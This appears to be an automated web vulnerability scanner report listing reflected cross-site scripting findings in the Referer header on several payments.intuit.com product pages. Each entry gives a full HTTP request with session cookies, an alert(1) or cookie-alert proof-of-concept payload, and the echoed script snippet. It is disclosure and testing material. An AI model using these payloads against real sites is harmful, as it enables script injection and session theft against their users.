Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /products/ HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=50367--><script>alert(1)</script>6c1e00f3f20
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 70e9a'-alert(1)-'1f622a992cd was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /products/ HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=70e9a'-alert(1)-'1f622a992cd
...[SNIP]... // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure var testReferDomain="0"; var eVar17Value = 'http://www.google.com/search?hl=en&q=70e9a'-alert(1)-'1f622a992cd'; </script> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ab319'-alert(1)-'38984c7dc20 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed that use client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /products/basic-payment-solutions/ HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=ab319'-alert(1)-'38984c7dc20
...[SNIP]...
// This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
var testReferDomain="0";
var eVar17Value = 'http://www.google.com/search?hl=en&q=ab319'-alert(1)-'38984c7dc20';
</script>
...[SNIP]...
The value of the Referer HTTP header is copied into an HTML comment. The payload 3d056--><script>alert(1)</script>4284ad0a88b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed that use client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /products/basic-payment-solutions/ HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=3d056--><script>alert(1)</script>4284ad0a88b
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 50dd9'-alert(1)-'453e9ddad06 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed that use client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /products/basic-payment-solutions/check-processing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=50dd9'-alert(1)-'453e9ddad06
...[SNIP]...
// This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
var testReferDomain="0";
var eVar17Value = 'http://www.google.com/search?hl=en&q=50dd9'-alert(1)-'453e9ddad06';
</script>
...[SNIP]...
The value of the Referer HTTP header is copied into an HTML comment. The payload d6539--><script>alert(1)</script>9940cd93a6a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed that use client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /products/basic-payment-solutions/check-processing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=d6539--><script>alert(1)</script>9940cd93a6a
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fffd5'-alert(1)-'a1adc0270af was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed that use client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /products/basic-payment-solutions/credit-card-processing-equipment.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=fffd5'-alert(1)-'a1adc0270af
...[SNIP]...
// This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
var testReferDomain="0";
var eVar17Value = 'http://www.google.com/search?hl=en&q=fffd5'-alert(1)-'a1adc0270af';
</script>
...[SNIP]...
The value of the Referer HTTP header is copied into an HTML comment. The payload 61f73--><script>alert(1)</script>21df0f4a775 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed that use client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /products/basic-payment-solutions/credit-card-processing-equipment.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=61f73--><script>alert(1)</script>21df0f4a775
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4f286'-alert(1)-'8e7fe4c65dd was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed that use client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /products/basic-payment-solutions/index.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=4f286'-alert(1)-'8e7fe4c65dd
...[SNIP]...
// This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
var testReferDomain="0";
var eVar17Value = 'http://www.google.com/search?hl=en&q=4f286'-alert(1)-'8e7fe4c65dd';
</script>
...[SNIP]...
The value of the Referer HTTP header is copied into an HTML comment. The payload 248a2--><script>alert(1)</script>58daf8a9700 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed that use client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /products/basic-payment-solutions/index.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=248a2--><script>alert(1)</script>58daf8a9700
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2f767'-alert(1)-'9675c472618 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed that use client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /products/basic-payment-solutions/mobile-credit-card-processing.jsp?scid=ips_gopay_free_card_reader_banner HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=2f767'-alert(1)-'9675c472618
...[SNIP]...
// This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
var testReferDomain="0";
var eVar17Value = 'http://www.google.com/search?hl=en&q=2f767'-alert(1)-'9675c472618';
</script>
...[SNIP]...
The value of the Referer HTTP header is copied into an HTML comment. The payload de4d4--><script>alert(1)</script>82fdb4532f7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed that use client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /products/basic-payment-solutions/mobile-credit-card-processing.jsp?scid=ips_gopay_free_card_reader_banner HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=de4d4--><script>alert(1)</script>82fdb4532f7
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e9f96'-alert(1)-'b074d756760 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
